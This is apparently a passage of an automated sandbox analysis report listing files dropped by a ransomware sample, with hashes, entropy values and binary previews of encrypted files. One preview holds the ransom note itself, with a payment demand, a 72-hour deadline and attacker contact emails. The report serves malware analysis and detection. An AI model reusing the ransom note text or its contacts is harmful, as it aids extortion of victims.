                                                                                                                                              Preview:qIr.....].A.H...._D...4.m.....*.w.D.p$.K...<...chH.*....[.xH..v.%.S.;..J.z{...]..-3-........0_..-:O~].x....V.d.....e.g&5U..E.....g.!.2.~]...w......".:...>./...Q.3...;(.|.M.M7F.......^v..$^...+..B..>.k..8.C.fkh\.6s.:&&.4.z2........<.(..3e........~.eLkF....T..V5`..*... R.#b..;B.K..<..AN...._f).j..Xm.p.......I....... .B.......ze..!...3S...|.}.....nKf...X#.`/.F...b..?..#9!y...:t?.&v.3...t..!L..!...I...l..r..,.(..c.C.g..6V..Zq&.._....d..b$2.r..:T$.<.....dMRz.k...A,x.....L...rv.!..7.y...`k.....7;..8..qskI)<..X`......>..8.....(....k.R..B:l....cy..\2z3.n...g.._....< .{..!q..0C.BST.|.\.,%*hu...c..m.....~....o.q..6.~(..cu....?.P&^[)&.B...=c_...C...~0p%K.....<....o.$.OI@...H....?..._..p.!...,...>0K.K...&..)..$r(.lyS......`o.[..C.9....k.;...eS..l.~.?b.A..SmG...0.VoTn..t.D..l.eA..;....%..%&!~..v ....].G..[.....c/4...1.T?.6p$g..j.f.$.^..B.N.Ho..[z..)H....u.TW......@2.l..a...z<..M...#G....bJWAf.........;78.......ASK....dw.[.k_9%(.)..G@.8.m./.Z...X...`!.^O.c..g
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.839498235220653
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:vpJ1y9Ro5AlIPGq2F/1tBSrXhoSdV+d6Iq5/uVXMwyk0:vpJk96DbS/6X6WIC/uVcXJ
                                                                                                                                              MD5:6FB5C0DD48EDA00702633A6C6E4085C5
                                                                                                                                              SHA1:AD5C1B0130D3592D30C59121B21F72DCC388DE7F
                                                                                                                                              SHA-256:FD1712ED18AAE4CDE0AA5A2C3471EC1DDB9B2F2F1579346F6C716460FB679898
                                                                                                                                              SHA-512:C5151A4869A2787E6E150D23DB389F530202A98D7E9BF93BB4D55E96526D716CC10251CA0F7FFDC454AD85CFB8A4EB25D01BCA0B1ED2D9FEBC4E4698AD9CA16E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:j.........:2;.....zg.H..-..H. .v .\....v..GY.D....OF.HO.e....";......t..a @.=.H..BIP.M...f......."..........)g..,......md3....?H.....(..5.#Y.9w.VD....g.P}.7....g........y.4p.}..c..#..w..<cP.`..."kS.1...!G__Y+........\...[.a...!.).$...j..l...6>..K.:...|..k^)..L..?..tv.I.fQ..>..4..p2.]\<Z.9.EK.....4..(^.1.?.+.I.u..E>.v..Yz%...F.... ...'T.+&Twp....R.9..3v.....y_.Ml..=R....Fd.'-.......D0...c~...Y...i.y./.8w...i..C..K....g....K.u...-o^L....C.i...lk.2S...B...E....Q.....%....GO.F.......M@....R..~Z#B).OC.S..fF.v.'....V..J..*..^...i..=k.f,U'....kk....^.h....&...`....Qout...k....+-.4..3K0I#....7..hH..Lw.X.....O.Y...)_A.....t..D....x....<.e.,.qG.Nz...NL.S...V.....=.'.....N...3e....).......A...ROv.*b...;....Et......L.}....u.nn...[g...u.. IR.....q{..^v.m..L.....kjz... ..\.v.....*..o....R...N.........E./...T...7..<q....' .../M..Ap...I..+.oX........ZE.G!.|...)..X.LCY.d..\.........Ty.T(.V<..wp...9..,e)...n...D..w.wi...d.......Q.A..zd...Df.k#P.l......+..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.839498235220653
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:vpJ1y9Ro5AlIPGq2F/1tBSrXhoSdV+d6Iq5/uVXMwyk0:vpJk96DbS/6X6WIC/uVcXJ
                                                                                                                                              MD5:6FB5C0DD48EDA00702633A6C6E4085C5
                                                                                                                                              SHA1:AD5C1B0130D3592D30C59121B21F72DCC388DE7F
                                                                                                                                              SHA-256:FD1712ED18AAE4CDE0AA5A2C3471EC1DDB9B2F2F1579346F6C716460FB679898
                                                                                                                                              SHA-512:C5151A4869A2787E6E150D23DB389F530202A98D7E9BF93BB4D55E96526D716CC10251CA0F7FFDC454AD85CFB8A4EB25D01BCA0B1ED2D9FEBC4E4698AD9CA16E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:j.........:2;.....zg.H..-..H. .v .\....v..GY.D....OF.HO.e....";......t..a @.=.H..BIP.M...f......."..........)g..,......md3....?H.....(..5.#Y.9w.VD....g.P}.7....g........y.4p.}..c..#..w..<cP.`..."kS.1...!G__Y+........\...[.a...!.).$...j..l...6>..K.:...|..k^)..L..?..tv.I.fQ..>..4..p2.]\<Z.9.EK.....4..(^.1.?.+.I.u..E>.v..Yz%...F.... ...'T.+&Twp....R.9..3v.....y_.Ml..=R....Fd.'-.......D0...c~...Y...i.y./.8w...i..C..K....g....K.u...-o^L....C.i...lk.2S...B...E....Q.....%....GO.F.......M@....R..~Z#B).OC.S..fF.v.'....V..J..*..^...i..=k.f,U'....kk....^.h....&...`....Qout...k....+-.4..3K0I#....7..hH..Lw.X.....O.Y...)_A.....t..D....x....<.e.,.qG.Nz...NL.S...V.....=.'.....N...3e....).......A...ROv.*b...;....Et......L.}....u.nn...[g...u.. IR.....q{..^v.m..L.....kjz... ..\.v.....*..o....R...N.........E./...T...7..<q....' .../M..Ap...I..+.oX........ZE.G!.|...)..X.LCY.d..\.........Ty.T(.V<..wp...9..,e)...n...D..w.wi...d.......Q.A..zd...Df.k#P.l......+..
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PDF document, version 1.6 (zip deflate encoded)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):313058
                                                                                                                                              Entropy (8bit):7.489403200507457
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:fIS2SsoMIr16Q9wt0I/pK9UW4cAgfmi+gKr116umiFBgKw1AlHCgKP1BSljgKr+g:fn2SVMIrIQ9c0I/s9U1cSrhjwvPnEr+g
                                                                                                                                              MD5:0B46EEFB0F38BAF77484929DD67DB02C
                                                                                                                                              SHA1:DE2CE2981F80DEB18935A2D7C76862D049FE7E2A
                                                                                                                                              SHA-256:496212C9D3B71BF483C6B97E4803E00B46B5F8AE731FE4EAE73F614B41F22163
                                                                                                                                              SHA-512:04A0518619385AC7E64A0B2122038C946A22E6E61A06FE539AB389EEB8C2414BF95A6D15DF2478E02F5733F4F2A8C4981B9D35BDE44C59FCD746B020E4B55172
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:%PDF-1.6.%......1196 0 obj.<</Filter/FlateDecode/First 418/Length 3681/N 46/Type/ObjStm>>stream..h..Z{o.9..*.....0b7.M`.@.....v.v.7...m.m7FRk[.L|..~E.e..'.L...WU..X/.....[.Im2o\.Ek.Rb.`..........SRGf2/..gRZ...1.l.LZU.......I..F.S....T.;.L..3..u....v:....t<......v.F.dV.t......N..e3.%(+....A.T*GX>+-...,%8t.....Hb|iB `M\...e.......e....=K..=.z.=C.MN....z%.$z..4..P.S..x..SP......i..06N.._...j.\^..&.....7..r.)t....u....@~Z..2....7..._.8Bw..}=.....l.}.9...8.._.=>....^w.YX?..f.^.._..0.1.........r.d.8....dE....U.`...].]/...2.x..B.....<...r.........u...i...wU.I.7....hok.)......:.7M....lA..M...e....u%a.9.y..-......b.-.Rs......}..?./s.J.e.p....<....s....X.L..R.].l........Y.....6c9..Xq[...#..."W..2.cF(...=@....*&....E=_7..Q...qV.rq...p.h..B......^...e........P......[..gP.+_O>.zU..fU...n)...N...C.J.|..W~j......#{y.. ..g".........nQ.....n.S"N.dR.......&.K......i.y.\n.u......9P0.....`.7.Yx.).3}.{p..z.(....:......*...&...e.mpG...3......9.p...3....FA..{...f.0.....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):313324
                                                                                                                                              Entropy (8bit):7.491735670311743
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:kAIS2SsoMIr16Q9wt0I/pK9UW4cAgfmi+gKr116umiFBgKw1AlHCgKP1BSljgKr2:vn2SVMIrIQ9c0I/s9U1cSrhjwvPnEr+P
                                                                                                                                              MD5:F99A671C0B936D0BCF86BABC6BC632E4
                                                                                                                                              SHA1:F9AAEC8EA6776F3DEA9C70430D6E92E73551B1A5
                                                                                                                                              SHA-256:78FEBC20FA4D3BA85FA3F3DC18F03D30C34173DD359C3CD6D0535AE2FD81C581
                                                                                                                                              SHA-512:558D08B2B4E4A7F03F6DE87E14014D31BF135DB378047FBE0BFFABE75F54D1E48EE629F2B79D7553F541685CF4B95EF44A73505DCF039D8455F40CBE86D237EF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..t.w.6...Q.y...._._.E.A9..+G..L9.qeC....m...p..P59k....N..B..HYF.4....?E!...{..".........!v..Y.Am..i......./8.............D.W..,..[..m......w...(.|X*.....y.(j.~F.......g..Z.?....A.U.%../...^.Vw........`.H.8.....b....O.-......y6......I@..i......z.2..v.6._.O.Z..._.ST..$..C..:.TU..{...Q<_N......^......4.w..:L....."....1v..EO...A...d%y...%.S.._...y0G...*.k.UzGN..pB.[..:#..9......F..MV.w.....z..>m....L.L.'..G..3...:.9.W1.y.."B.\......$. ......O&]..O..R[..;f....)v..h...S....y.G..H.h.........~.2.c. k.8..^...M.56..b.}W.t...(.G.v...gg.d,..G....X.t.....=...3`..)%...*....j..#-?v..%.......J.M.......N...T..u....|b...8..`......?3.Ea.xz.R.....N.[.C;=....58.3...0B0..;....dy...h.f..%[....0.t.%.6?...$.ab&..8.[..*......y|..M....V....{."{.......{{2\eyRd..=h.q.+.9.Px....F...74.........2b.+..N6..3...9L}&F={..V.l.M.5w.;Bf...5.]..u...{...,s..p).G.L(......k,..x....U.S.....7I....,.#R...W.........|...Tt.).....z$.W,.(..V.~....;.|7.4N.~..7:$.htJ..`.? *n.%E
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):313324
                                                                                                                                              Entropy (8bit):7.491735670311743
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:kAIS2SsoMIr16Q9wt0I/pK9UW4cAgfmi+gKr116umiFBgKw1AlHCgKP1BSljgKr2:vn2SVMIrIQ9c0I/s9U1cSrhjwvPnEr+P
                                                                                                                                              MD5:F99A671C0B936D0BCF86BABC6BC632E4
                                                                                                                                              SHA1:F9AAEC8EA6776F3DEA9C70430D6E92E73551B1A5
                                                                                                                                              SHA-256:78FEBC20FA4D3BA85FA3F3DC18F03D30C34173DD359C3CD6D0535AE2FD81C581
                                                                                                                                              SHA-512:558D08B2B4E4A7F03F6DE87E14014D31BF135DB378047FBE0BFFABE75F54D1E48EE629F2B79D7553F541685CF4B95EF44A73505DCF039D8455F40CBE86D237EF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..t.w.6...Q.y...._._.E.A9..+G..L9.qeC....m...p..P59k....N..B..HYF.4....?E!...{..".........!v..Y.Am..i......./8.............D.W..,..[..m......w...(.|X*.....y.(j.~F.......g..Z.?....A.U.%../...^.Vw........`.H.8.....b....O.-......y6......I@..i......z.2..v.6._.O.Z..._.ST..$..C..:.TU..{...Q<_N......^......4.w..:L....."....1v..EO...A...d%y...%.S.._...y0G...*.k.UzGN..pB.[..:#..9......F..MV.w.....z..>m....L.L.'..G..3...:.9.W1.y.."B.\......$. ......O&]..O..R[..;f....)v..h...S....y.G..H.h.........~.2.c. k.8..^...M.56..b.}W.t...(.G.v...gg.d,..G....X.t.....=...3`..)%...*....j..#-?v..%.......J.M.......N...T..u....|b...8..`......?3.Ea.xz.R.....N.[.C;=....58.3...0B0..;....dy...h.f..%[....0.t.%.6?...$.ab&..8.[..*......y|..M....V....{."{.......{{2\eyRd..=h.q.+.9.Px....F...74.........2b.+..N6..3...9L}&F={..V.l.M.5w.;Bf...5.]..u...{...,s..p).G.L(......k,..x....U.S.....7I....,.#R...W.........|...Tt.).....z$.W,.(..V.~....;.|7.4N.~..7:$.htJ..`.? *n.%E
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PDF document, version 1.6 (zip deflate encoded)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):313058
                                                                                                                                              Entropy (8bit):7.489403200507457
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3072:fIS2SsoMIr16Q9wt0I/pK9UW4cAgfmi+gKr116umiFBgKw1AlHCgKP1BSljgKr+g:fn2SVMIrIQ9c0I/s9U1cSrhjwvPnEr+g
                                                                                                                                              MD5:0B46EEFB0F38BAF77484929DD67DB02C
                                                                                                                                              SHA1:DE2CE2981F80DEB18935A2D7C76862D049FE7E2A
                                                                                                                                              SHA-256:496212C9D3B71BF483C6B97E4803E00B46B5F8AE731FE4EAE73F614B41F22163
                                                                                                                                              SHA-512:04A0518619385AC7E64A0B2122038C946A22E6E61A06FE539AB389EEB8C2414BF95A6D15DF2478E02F5733F4F2A8C4981B9D35BDE44C59FCD746B020E4B55172
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:%PDF-1.6.%......1196 0 obj.<</Filter/FlateDecode/First 418/Length 3681/N 46/Type/ObjStm>>stream..h..Z{o.9..*.....0b7.M`.@.....v.v.7...m.m7FRk[.L|..~E.e..'.L...WU..X/.....[.Im2o\.Ek.Rb.`..........SRGf2/..gRZ...1.l.LZU.......I..F.S....T.;.L..3..u....v:....t<......v.F.dV.t......N..e3.%(+....A.T*GX>+-...,%8t.....Hb|iB `M\...e.......e....=K..=.z.=C.MN....z%.$z..4..P.S..x..SP......i..06N.._...j.\^..&.....7..r.)t....u....@~Z..2....7..._.8Bw..}=.....l.}.9...8.._.=>....^w.YX?..f.^.._..0.1.........r.d.8....dE....U.`...].]/...2.x..B.....<...r.........u...i...wU.I.7....hok.)......:.7M....lA..M...e....u%a.9.y..-......b.-.Rs......}..?./s.J.e.p....<....s....X.L..R.].l........Y.....6c9..Xq[...#..."W..2.cF(...=@....*&....E=_7..Q...qV.rq...p.h..B......^...e........P......[..gP.+_O>.zU..fU...n)...N...C.J.|..W~j......#{y.. ..g".........nQ.....n.S"N.dR.......&.K......i.y.\n.u......9P0.....`.7.Yx.).3}.{p..z.(....:......*...&...e.mpG...3......9.p...3....FA..{...f.0.....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):377
                                                                                                                                              Entropy (8bit):7.426604194867898
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:btNltebblt3IMFh5LGTzvGpBp8SHdlE/OfVBZQ6Ha32wMbRgrvotq/4AzVMenjqW:SQof2ymglLnZQF3xzrvwq/4OVMejLrAs
                                                                                                                                              MD5:635014E91484650EE97803F024C54734
                                                                                                                                              SHA1:D3CD4978DDC161FDE767E386B6009BDFDDB22938
                                                                                                                                              SHA-256:693CF7E26101E1BFC590494A53BC559F87EE0506C30BD492DE85F241C00A2272
                                                                                                                                              SHA-512:B6F2090E8A280AE6022948D1F1CED8F8D7892BC3DE3738A9C0E082D56753863492324835B192271F7C46397E6E1390D7CF88405C09660E0256466F17D22F3AB9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:N.Jt.tC{6.....!.../..O..J../.?].@.t.h..S(......q../.......Q....qq..!...... P.8..N....D.w.amazon.com/..d..Sn.......YN......2ll...F..|....A...c..g..U......,Y..w..[........]._].E'...%.x..^^>.....zM@... @.0.t..I...C".=........;.'}.d..j....}1..0NMe.......8...... .).YDj..:......8$.n....%.3-..=.".%...d.~\..91....0)..5.6x.I./....U.u..5.D.`R.7,D......0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):377
                                                                                                                                              Entropy (8bit):7.426604194867898
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:btNltebblt3IMFh5LGTzvGpBp8SHdlE/OfVBZQ6Ha32wMbRgrvotq/4AzVMenjqW:SQof2ymglLnZQF3xzrvwq/4OVMejLrAs
                                                                                                                                              MD5:635014E91484650EE97803F024C54734
                                                                                                                                              SHA1:D3CD4978DDC161FDE767E386B6009BDFDDB22938
                                                                                                                                              SHA-256:693CF7E26101E1BFC590494A53BC559F87EE0506C30BD492DE85F241C00A2272
                                                                                                                                              SHA-512:B6F2090E8A280AE6022948D1F1CED8F8D7892BC3DE3738A9C0E082D56753863492324835B192271F7C46397E6E1390D7CF88405C09660E0256466F17D22F3AB9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:N.Jt.tC{6.....!.../..O..J../.?].@.t.h..S(......q../.......Q....qq..!...... P.8..N....D.w.amazon.com/..d..Sn.......YN......2ll...F..|....A...c..g..U......,Y..w..[........]._].E'...%.x..^^>.....zM@... @.0.t..I...C".=........;.'}.d..j....}1..0NMe.......8...... .).YDj..:......8$.n....%.3-..=.".%...d.~\..91....0)..5.6x.I./....U.u..5.D.`R.7,D......0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):474
                                                                                                                                              Entropy (8bit):7.5882695950457135
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:mV2m7bQ5+0uszNa/3VRS72k88GDSxw6KMX9Vsvk/OLuNLmn:IQA0uszNa/HIRxKKVsvk/OLuNC
                                                                                                                                              MD5:455842253186A14F6239C73B49FAC840
                                                                                                                                              SHA1:D70583F13CC5B4663961A40A23D50ADD741AC07B
                                                                                                                                              SHA-256:0B16871E53968401EE5C75F37373461CDCDFFC628945B22E2B479E5E9219CF9E
                                                                                                                                              SHA-512:569A08D84E8173C95CF05D4CE303CD69AF879B962F2BDDE8A5F33615607D854BDBCA69528B45E9C8E7449C5B8E57F715F7317D5FAF0ACD618519EC16C70336C2
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..1<d........^}..x.C.v..1.l].../,..>.C,...Q.$..r0FYl...l....ak5.....*..:.B.0.1..._Ly.h...{.|:.1....y.*rG.v.DU...W..k...0..o%..%]....;.*1.9j%.....2....X..x6..V'`......l.1...)..!J.....Xmages\bing.ico..Fs..........v..S......n.....\)n....h..N.8.Q.c-.3.K..1Ag......2|....&.f.......>.x2z.s.......)....~_..Z.m..P=.qW.7?......3@./..:....".-jMC.aK\./..g....A...G...YG......7..T.....e..?.poR.$....K....{.."\..0"v.!...+...-....C..5..!.W...$E!.E.Y..^C..0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):474
                                                                                                                                              Entropy (8bit):7.5882695950457135
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:mV2m7bQ5+0uszNa/3VRS72k88GDSxw6KMX9Vsvk/OLuNLmn:IQA0uszNa/HIRxKKVsvk/OLuNC
                                                                                                                                              MD5:455842253186A14F6239C73B49FAC840
                                                                                                                                              SHA1:D70583F13CC5B4663961A40A23D50ADD741AC07B
                                                                                                                                              SHA-256:0B16871E53968401EE5C75F37373461CDCDFFC628945B22E2B479E5E9219CF9E
                                                                                                                                              SHA-512:569A08D84E8173C95CF05D4CE303CD69AF879B962F2BDDE8A5F33615607D854BDBCA69528B45E9C8E7449C5B8E57F715F7317D5FAF0ACD618519EC16C70336C2
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..1<d........^}..x.C.v..1.l].../,..>.C,...Q.$..r0FYl...l....ak5.....*..:.B.0.1..._Ly.h...{.|:.1....y.*rG.v.DU...W..k...0..o%..%]....;.*1.9j%.....2....X..x6..V'`......l.1...)..!J.....Xmages\bing.ico..Fs..........v..S......n.....\)n....h..N.8.Q.c-.3.K..1Ag......2|....&.f.......>.x2z.s.......)....~_..Z.m..P=.qW.7?......3@./..:....".-jMC.aK\./..g....A...G...YG......7..T.....e..?.poR.$....K....{.."\..0"v.!...+...-....C..5..!.W...$E!.E.Y..^C..0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):379
                                                                                                                                              Entropy (8bit):7.3572921663971735
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:qKBzfqQcBGrdFZ3Et/9f7qEuDG4gp+SD6G+15SaTp1QR7RFp/2qOC3kpncQNnKmn:qKBj7uaFZ3ElB7qEuDG4y6drKR7VpMzP
                                                                                                                                              MD5:B22E7D0CCC1AF424310DEAA4D75BEDE7
                                                                                                                                              SHA1:4CDE702219CEBE3AEFCEAB0642A1B8DBA22FCF2A
                                                                                                                                              SHA-256:2AE5ACBD69D3CB71064AE4495E859DDEFE39D764B5F8AC1AEFBD1A433E26FCFD
                                                                                                                                              SHA-512:EA182F1D3E243EA11BA5457F3B3275A5E542573D7530EB21BD4B4EEC3CCA4FBA0F0A18FB6011EA7FF40E9891EE5DE308A5486C05999896649AFDFCD2564D76FF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:......+..R..r...RVA$.J.1]...5kyz.2Y.....*`.W...V.b([..\<..]ly.5...nJ...n....._......W./...{^|{|...(....b(zr...d..g...}v....:?.*m..h.@2...ZM.l.0h....08F....".0<}...........[l....Je....e.X.@.O..7"....C..$.(.G...j..A<,x..........\...Il.D..S7.o.....Dw.5..............b...?>....?.]..3.qZx...C(.T.n`..A.....S.4.;e.)H+...q}.R..3.81...7.....l.K.`.=.p.....gW0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):379
                                                                                                                                              Entropy (8bit):7.3572921663971735
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:qKBzfqQcBGrdFZ3Et/9f7qEuDG4gp+SD6G+15SaTp1QR7RFp/2qOC3kpncQNnKmn:qKBj7uaFZ3ElB7qEuDG4y6drKR7VpMzP
                                                                                                                                              MD5:B22E7D0CCC1AF424310DEAA4D75BEDE7
                                                                                                                                              SHA1:4CDE702219CEBE3AEFCEAB0642A1B8DBA22FCF2A
                                                                                                                                              SHA-256:2AE5ACBD69D3CB71064AE4495E859DDEFE39D764B5F8AC1AEFBD1A433E26FCFD
                                                                                                                                              SHA-512:EA182F1D3E243EA11BA5457F3B3275A5E542573D7530EB21BD4B4EEC3CCA4FBA0F0A18FB6011EA7FF40E9891EE5DE308A5486C05999896649AFDFCD2564D76FF
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:......+..R..r...RVA$.J.1]...5kyz.2Y.....*`.W...V.b([..\<..]ly.5...nJ...n....._......W./...{^|{|...(....b(zr...d..g...}v....:?.*m..h.@2...ZM.l.0h....08F....".0<}...........[l....Je....e.X.@.O..7"....C..$.(.G...j..A<,x..........\...Il.D..S7.o.....Dw.5..............b...?>....?.]..3.qZx...C(.T.n`..A.....S.4.;e.)H+...q}.R..3.81...7.....l.K.`.=.p.....gW0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):377
                                                                                                                                              Entropy (8bit):7.3880575928104975
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:alhgt76ZcUO1OvOH4XXxzmajlLspRVK18hEDjOyVG9fh4HD+svBaNQCktr+G3YaS:GhQ6ZcUAO2H4XBKa9spRVXhEDjZVG9fz
                                                                                                                                              MD5:7F5C58990BCBB4D67B245C99DCA8606E
                                                                                                                                              SHA1:283542A1B4BFE90FB400F1143C82CC849A9073F3
                                                                                                                                              SHA-256:326150C72CCEB2EC48014CF2B78CE434788515849FEFAD407CD3B0EED99737CD
                                                                                                                                              SHA-512:DF505D6990C95DE791B24291BA77DE2BE60E41FD1F1174521765067D8C0185B3B0D931892A01916B7F3F73D8AA4C541DD315D583AD331577A4C954B40EF1320C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:**.l. $?..$..%>.l.f.G.p.d,p8..A..v.:.o}...z...#..Q.U..B....../...R.T....d./.=b.}]%lg.a.|..!w.google.com/...W.q..tI...... ..N...6L..:).']..g..@..j....[oV4........F!A..z......&.p.N.`....\.....p..*...gF{O.m...2..e.#zf...)0.]......D....X..Y.Y`x...?..~2j[2....2*~.}...Gh....."*.6;...a{_cQi..f.}..Tl..z#...;e.h...t(...T...U..8.g....|.@..o......k....eA.~.L0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):377
                                                                                                                                              Entropy (8bit):7.3880575928104975
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:alhgt76ZcUO1OvOH4XXxzmajlLspRVK18hEDjOyVG9fh4HD+svBaNQCktr+G3YaS:GhQ6ZcUAO2H4XBKa9spRVXhEDjZVG9fz
                                                                                                                                              MD5:7F5C58990BCBB4D67B245C99DCA8606E
                                                                                                                                              SHA1:283542A1B4BFE90FB400F1143C82CC849A9073F3
                                                                                                                                              SHA-256:326150C72CCEB2EC48014CF2B78CE434788515849FEFAD407CD3B0EED99737CD
                                                                                                                                              SHA-512:DF505D6990C95DE791B24291BA77DE2BE60E41FD1F1174521765067D8C0185B3B0D931892A01916B7F3F73D8AA4C541DD315D583AD331577A4C954B40EF1320C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:**.l. $?..$..%>.l.f.G.p.d,p8..A..v.:.o}...z...#..Q.U..B....../...R.T....d./.=b.}]%lg.a.|..!w.google.com/...W.q..tI...... ..N...6L..:).']..g..@..j....[oV4........F!A..z......&.p.N.`....\.....p..*...gF{O.m...2..e.#zf...)0.]......D....X..Y.Y`x...?..~2j[2....2*~.}...Gh....."*.6;...a{_cQi..f.}..Tl..z#...;e.h...t(...T...U..8.g....|.@..o......k....eA.~.L0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
